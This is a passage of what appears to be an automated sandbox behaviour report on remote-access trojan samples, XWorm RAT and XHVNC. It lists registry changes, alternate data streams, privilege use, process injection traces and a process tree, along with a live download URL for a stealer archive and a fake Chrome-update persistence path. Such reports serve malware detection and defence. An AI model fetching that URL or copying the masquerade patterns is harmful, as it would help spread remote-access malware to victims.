0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000001000000040000001c0000000100000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 XHVNC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Downloads" XHVNC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133524141059344388" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 XHVNC.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 XHVNC.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" XHVNC.exe Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" XHVNC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
NTFS ADS 14 IoCs
Processes:
msedge.exeXWorm RAT V2.1.exemsedge.exemsedge.exeXWorm RAT V2.1.exemsedge.exemsedge.exeXWorm RAT V2.1.exemsedge.exemsedge.exeXWorm RAT V2.1.exeCommand Reciever.exemsedge.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA XWorm RAT V2.1.exe File opened for modification C:\Users\Admin\Downloads\XWorm-3.1-main.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA XWorm RAT V2.1.exe File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\xworm5.5-main.zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA XWorm RAT V2.1.exe File opened for modification C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier msedge.exe File created C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA XWorm RAT V2.1.exe File created C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe\:Zone.Identifier:$DATA Command Reciever.exe File opened for modification C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Xworm-RAT-V3.1-main.zip:Zone.Identifier msedge.exe -
Suspicious behavior: AddClipboardFormatListener 7 IoCs
Processes:
explorer.exepid process 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exeCommand Reciever.exemsedge.exeUpdate.exepid process 4112 msedge.exe 4112 msedge.exe 1408 msedge.exe 1408 msedge.exe 1532 identity_helper.exe 1532 identity_helper.exe 3064 msedge.exe 3064 msedge.exe 3792 msedge.exe 3792 msedge.exe 4204 msedge.exe 4204 msedge.exe 2452 msedge.exe 2452 msedge.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 1908 Command Reciever.exe 4476 msedge.exe 4476 msedge.exe 4476 msedge.exe 4476 msedge.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe 3016 Update.exe -
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
Processes:
XHVNC.exeexplorer.exeOpenWith.exeUpdate.exesvchost.exeOpenWith.exeXHVNC.exeXHVNC.exeOpenWith.exepid process 2392 XHVNC.exe 3156 explorer.exe 1712 OpenWith.exe 3016 Update.exe 2808 svchost.exe 6816 OpenWith.exe 6708 XHVNC.exe 1604 XHVNC.exe 6096 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 60 IoCs
Processes:
msedge.exechrome.exemsedge.exepid process 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe 2456 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Command Reciever.exetasklist.exeUpdate.exeCommand Reciever.exetasklist.exeUpdate.exeXHVNC-Client.exeexplorer.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exechrome.exedescription pid process Token: SeDebugPrivilege 1908 Command Reciever.exe Token: SeDebugPrivilege 896 tasklist.exe Token: SeDebugPrivilege 3016 Update.exe Token: SeDebugPrivilege 2132 Command Reciever.exe Token: SeDebugPrivilege 3572 tasklist.exe Token: SeDebugPrivilege 4348 Update.exe Token: SeDebugPrivilege 2840 XHVNC-Client.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeDebugPrivilege 5888 taskkill.exe Token: SeDebugPrivilege 5908 taskkill.exe Token: SeDebugPrivilege 5876 taskkill.exe Token: SeDebugPrivilege 5896 taskkill.exe Token: SeDebugPrivilege 5928 taskkill.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 3156 explorer.exe Token: SeCreatePagefilePrivilege 3156 explorer.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe Token: SeShutdownPrivilege 5320 chrome.exe Token: SeCreatePagefilePrivilege 5320 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exeexplorer.exechrome.exechrome.exepid process 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 1408 msedge.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 5320 chrome.exe 3268 chrome.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
XHVNC.exeUpdate.exeStartMenuExperienceHost.exeOpenWith.exeOpenWith.exeAcroRd32.exesvchost.exeMiniSearchHost.exeOpenWith.exeXHVNC.exeexplorer.exeOpenWith.exeXHVNC.exepid process 2392 XHVNC.exe 2392 XHVNC.exe 3016 Update.exe 2392 XHVNC.exe 4076 StartMenuExperienceHost.exe 6096 OpenWith.exe 2392 XHVNC.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 1712 OpenWith.exe 4944 AcroRd32.exe 4944 AcroRd32.exe 4944 AcroRd32.exe 4944 AcroRd32.exe 2808 svchost.exe 6340 MiniSearchHost.exe 6816 OpenWith.exe 6708 XHVNC.exe 6708 XHVNC.exe 6708 XHVNC.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 3156 explorer.exe 6480 OpenWith.exe 3156 explorer.exe 3156 explorer.exe 1604 XHVNC.exe 1604 XHVNC.exe 3156 explorer.exe 3156 explorer.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe 6096 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1408 wrote to memory of 3560 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3560 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 3476 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4112 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4112 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe PID 1408 wrote to memory of 4924 1408 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f73cb8,0x7ff9a5f73cc8,0x7ff9a5f73cd82⤵PID:3560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:22⤵PID:3476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:82⤵PID:4924
-
